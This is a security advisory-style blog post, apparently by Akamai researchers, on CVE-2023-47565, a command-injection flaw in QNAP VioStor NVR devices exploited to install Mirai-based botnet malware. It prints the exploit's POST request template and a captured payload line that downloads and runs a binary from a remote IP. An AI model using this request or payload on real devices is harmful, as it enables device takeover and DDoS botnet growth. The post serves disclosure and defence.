需要云计算吗? 即刻开始体验

QNAP VioStor NVR 中被频繁利用的漏洞:已修复,有补丁可用

Akamai Wave Blue

寫於

Chad SeamanLarry Cashdollar

December 14, 2023

Chad Seaman headshot

寫於

Chad Seaman

Chad Seaman 是 Akamai 安全情报响应团队的首席安全研究员兼团队负责人。他自豪地称自己为“互联网垃圾箱潜水员”,喜欢探查在互联网上发现的各种“垃圾”。Chad 的职业生涯始于程序员,在因数据泄露调查接触到安全、漏洞利用和取证之后,他便与安全工作结下了不解之缘。他现在忙于恶意软件调查、逆向工程、漏洞研究、DDoS 攻击和网络犯罪调查。他喜欢开飞机;喜欢远远地在纸上戳洞;喜欢在大自然中消磨时光,尤其喜欢在林间小径骑越野车。

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.

执行摘要

  • Akamai 安全情报响应团队 (SIRT) 针对 InfectedSlurs 公告 系列发布了额外的更新,因为其中一个受影响的供应商 已发布公告信息 和指南。 

  • 在现实环境中发现 QNAP 存在一个漏洞,其 CVE ID 为 CVE-2023-47565,CVSS v3 评分为 8.0。

  • 在现实环境中捕获的恶意攻击负载会安装基于 Mirai 的恶意软件,进而创建 分布式拒绝服务 (DDoS) 僵尸网络。

  • 我们在原始研究中提供了一个包含各种 攻击迹象 (IOC)、Snort 规则和 YARA 规则 的列表,以帮助确定现实环境中的这些漏洞利用尝试以及防御者网络中可能存在的活跃感染。

您需要了解的内容

在研究 InfectedSlurs 的过程中,SIRT 发现了 QNAP VioStor 网络视频录像机 (NVR) 设备中存在一个被频繁利用的漏洞。NVR 设备是一种高性能的网络监控解决方案,用于在网络中监控 IP 摄像头、进行视频录制、回放以及远程数据访问。为此漏洞分配的 CVE ID 为 CVE-2023-47565,其 CVSS v3 评分为 8.0。

利用该漏洞,经过身份验证的攻击者可以通过对管理接口发出的 POST 请求来传送攻击负载,进而实现操作系统命令注入。在其当前配置中,它会利用已捕获的有效负载中的设备默认凭据。

受影响的 QNAP VioStor NVR 固件版本包括:

  • VioStor NVR:版本 5.0.0 及更低版本(5.0.0 于 2014 年 6 月 21 日发布)

QNAP 认为这些设备已经停止提供支持,但 该供应商建议 将现有设备上的 VioStor 固件升级到最新版本。虽然这个问题已经通过补丁得到了解决,但从未公开报道或披露过。 此外,用户应该更改其设备上的默认密码。

US-CERT 还发布了一份公告。

观察到的漏洞利用情况

我们审视了在 InfectedSlurs 活动期间的漏洞攻击情况,由于团队无法将观察到的漏洞与特定设备或制造商进行有效关联,因此最初我们仅上报了两个零日漏洞。这使得我们很难确定该漏洞是否属于 零日 漏洞。

经过对该漏洞的各个方面和攻击负载进行深入剖析,SIRT 判断攻击的目标是 QNAP VioStor NVR 设备。这些设备符合该活动的目标特征,并且被发现带有弱默认凭据(在设备手册中以及在漏洞观察中均有所发现)。与最初的零日漏洞相似,受感染的设备为攻击者提供了在受影响的物联网 (IoT) 和 NVR 设备的 NTP 设置中触发操作系统命令注入漏洞的机会。

在将这些理论传递给 US-CERT 后,他们与 Akamai SIRT 和 QNAP 进行协作,共同审查了这些证据,并协助确认了 SIRT 的理论。 最终,QNAP 证实,攻击负载针对的是他们已停用且不再受支持的 VioStor 设备 ,但仅限于他们之前发布的固件的旧版本(5.0.0 或更低版本)。

攻击者可以向 /cgi-bin/server/server.cgi 路径发送 POST 请求来利用该漏洞。远程代码执行 (RCE) 存在于指定了 SPECIFIC_SERVER 参数的位置(图 1)。

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

图 1:尝试通过命令注入利用 RCE

图 2 展示了捕获到的感染负载的示例。

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

图 2:捕获到的 RCE 负载

基本安全实践很重要

基本内容很重要。 我们所观察到的种种问题再次强调了基本安全最佳实践的重要性,例如在初始设置期间更改设备上的默认密码。此外,这也让我们认识到必须实施更强大的长期、主动安全协议,例如确保对系统进行一致更新以抵御潜在攻击,并且需要偶尔检查系统/设备,尤其是在它们出现异常行为时。

结论

我们定制的蜜罐网络部署再次提供了有关网络攻击的重要见解,并揭示了之前未被发现的漏洞。默认凭据和过时、不受支持的网络系统,已经成为僵尸网络感染的主要途径。旧版系统是攻击者发现新漏洞并用以传播恶意软件的沃土。

这一发现强调了加强对 IoT 最佳实践的认识和教育的重要性,也突出了普通消费者所面临的相关风险。同时,不仅消费者需要学习这些最佳实践,设备制造商也需要深入了解并掌握这些实践。较长的软件支持周期和出厂安全设置(如强制更改密码)对于维护系统安全性至关重要。

关注最新动态

Akamai 安全情报组将继续监控此类威胁并及时进行报告,以提高我们的客户和安全社区的整体安全意识。有关更多研究内容, 请关注我们的微信公众号,及时获取我们所掌握的最新情况。

在此,Akamai SIRT 特别感谢 CISA、US-CERT 和 QNAP 在沟通、协调、确认、修复和披露方面给予我们的帮助



Akamai Wave Blue

寫於

Chad SeamanLarry Cashdollar

December 14, 2023

Chad Seaman headshot

寫於

Chad Seaman

Chad Seaman 是 Akamai 安全情报响应团队的首席安全研究员兼团队负责人。他自豪地称自己为“互联网垃圾箱潜水员”,喜欢探查在互联网上发现的各种“垃圾”。Chad 的职业生涯始于程序员,在因数据泄露调查接触到安全、漏洞利用和取证之后,他便与安全工作结下了不解之缘。他现在忙于恶意软件调查、逆向工程、漏洞研究、DDoS 攻击和网络犯罪调查。他喜欢开飞机;喜欢远远地在纸上戳洞;喜欢在大自然中消磨时光,尤其喜欢在林间小径骑越野车。

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.